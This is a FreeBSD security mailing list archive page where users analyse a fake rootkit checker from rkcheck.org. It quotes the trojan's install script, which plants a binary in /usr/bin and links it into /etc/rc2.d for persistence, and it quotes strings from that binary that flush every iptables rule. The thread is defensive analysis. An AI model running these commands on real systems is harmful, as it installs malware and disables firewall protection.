Date: Fri, 27 Feb 2015 02:40:05 +1100 (EST) From: Ian Smith <smithi@nimnet.asn.au> To: Christopher Schulte <christopher@schulte.org> Cc: Joseph Mingrone <jrm@ftfl.ca>, "freebsd-security@freebsd.org" <freebsd-security@freebsd.org>, Philip Jocks <pjlists@netzkommune.com> Subject: Re: has my 10.1-RELEASE system been compromised Message-ID: <20150227022821.P38620@sola.nimnet.asn.au> In-Reply-To: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>
next in thread | previous in thread | raw e-mail | index | archive | help
On Wed, 25 Feb 2015 20:55:43 +0000, Christopher Schulte wrote: > > On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists@netzkommune.com> wrote: > > > > it felt pretty scammy to me, googling for the "worm" got me to > rkcheck.org which was registered a few days ago and looks like a > tampered version of chkrootkit. I hope, nobody installed it anywhere, > it seems to execute rkcheck/tests/.unit/test.sh which contains > > > > #!/bin/bash > > > > cp tests/.unit/test /usr/bin/rrsyncn > > chmod +x /usr/bin/rrsyncn > > rm -fr /etc/rc2.d/S98rsyncn > > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > > /usr/bin/rrsyncn > > exit > > > > That doesn't look like something you'd want on your boxÿÿ > > I filed a report with Google about that domain (Google Safe > Browsing), briefly describing whatÿÿs been recounted here on this > thread. It seems quite suspicious, agreed. > > Has anyone started an analysis of the rrsyncn binary? The last few > lines of a simple string dump are interestingÿÿ take note what looks > to be an IP address of 95.215.44.195. > > /bin/sh > iptables -X 2> /dev/null > iptables -F 2> /dev/null > iptables -t nat -F 2> /dev/null > iptables -t nat -X 2> /dev/null > iptables -t mangle -F 2> /dev/null > iptables -t mangle -X 2> /dev/null > iptables -P INPUT ACCEPT 2> /dev/null > iptables -P FORWARD ACCEPT 2> /dev/null > iptables -P OUTPUT ACCEPT 2> /dev/null > udevd > 95.215.44.195 > ;*3$" > > > Cheers, > > > > Philip > > Chris Seeing as noone's mentioned it yet .. if your (linux) box were running iptables - a reasonable assumption - then running those commands would remove and flush all your rules, leaving you with a firewall that accepted everything, as good as no firewall at all. And then .. ? At least FreeBSD isn't the lowest hanging fruit for these monkeys .. cheers, Ian From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 18:02:59 2015 Return-Path: <owner-freebsd-security@FreeBSD.ORG> Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id E7D18F6F for <freebsd-security@freebsd.org>; Thu, 26 Feb 2015 18:02:59 +0000 (UTC) Received: from out1-smtp.messagingengine.com (out1-smtp.messagingengine.com [66.111.4.25]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id B7A61CAE for <freebsd-security@freebsd.org>; Thu, 26 Feb 2015 18:02:59 +0000 (UTC) Received: from compute5.internal (compute5.nyi.internal [10.202.2.45]) by mailout.nyi.internal (Postfix) with ESMTP id 8FC0121795 for <freebsd-security@freebsd.org>; Thu, 26 Feb 2015 13:02:51 -0500 (EST) Received: from web3 ([10.202.2.213]) by compute5.internal (MEProxy); Thu, 26 Feb 2015 13:02:52 -0500 DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d= messagingengine.com; h=message-id:x-sasl-enc:from:to :mime-version:content-transfer-encoding:content-type:in-reply-to :references:subject:date; s=smtpout; bh=2gzxv/mJeMzPZtuOIVkm4evr J/o=; b=Tzq6zQnJ5Ay1wW3g2OjfxtzQIXI6s9kJzRSnuX78Ks0Dh6+o7itI2AJD bO7tcZMDoLVcgibizSLs0ZvJs0EClMNqBfjAAztdIaTU/PNWpsfoNrxX7nsTjd+x X4728HvLtvDQkb3yfnU7oCkIQIody0xD1JAKE9J4SPhoLeweu3c= Received: by web3.nyi.internal (Postfix, from userid 99) id 3A73511676F; Thu, 26 Feb 2015 13:02:52 -0500 (EST) Message-Id: <1424973772.4085078.232885457.0277C7ED@webmail.messagingengine.com> X-Sasl-Enc: qJJs6PCrJ4dw5ww0iYcYocqzhOfAJXZo+ObfpP+N7dHF 1424973772 From: Mark Felder <feld@FreeBSD.org> To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset="utf-8" X-Mailer: MessagingEngine.com Webmail Interface - ajax-4ba7306c In-Reply-To: <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl> References: <864mq9zsmm.fsf@gly.ftfl.ca> <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl> Subject: Re: has my 10.1-RELEASE system been compromised Date: Thu, 26 Feb 2015 12:02:52 -0600 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" <freebsd-security.freebsd.org> List-Unsubscribe: <http://lists.freebsd.org/mailman/options/freebsd-security>, <mailto:freebsd-security-request@freebsd.org?subject=unsubscribe> List-Archive: <http://lists.freebsd.org/pipermail/freebsd-security/>; List-Post: <mailto:freebsd-security@freebsd.org> List-Help: <mailto:freebsd-security-request@freebsd.org?subject=help> List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-security>, <mailto:freebsd-security-request@freebsd.org?subject=subscribe> X-List-Received-Date: Thu, 26 Feb 2015 18:03:00 -0000 On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote: >=20 > Example: > # touch -t 201501010000 foo > # find / -user www -newer foo >=20 > If you don=E2=80=99t find anything, look back a little further. > Hopefully you will find a clue in this way. >=20 Thanks for posting this trick -- I've never considered it before and will certainly put it in my toolbox!
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20150227022821.P38620>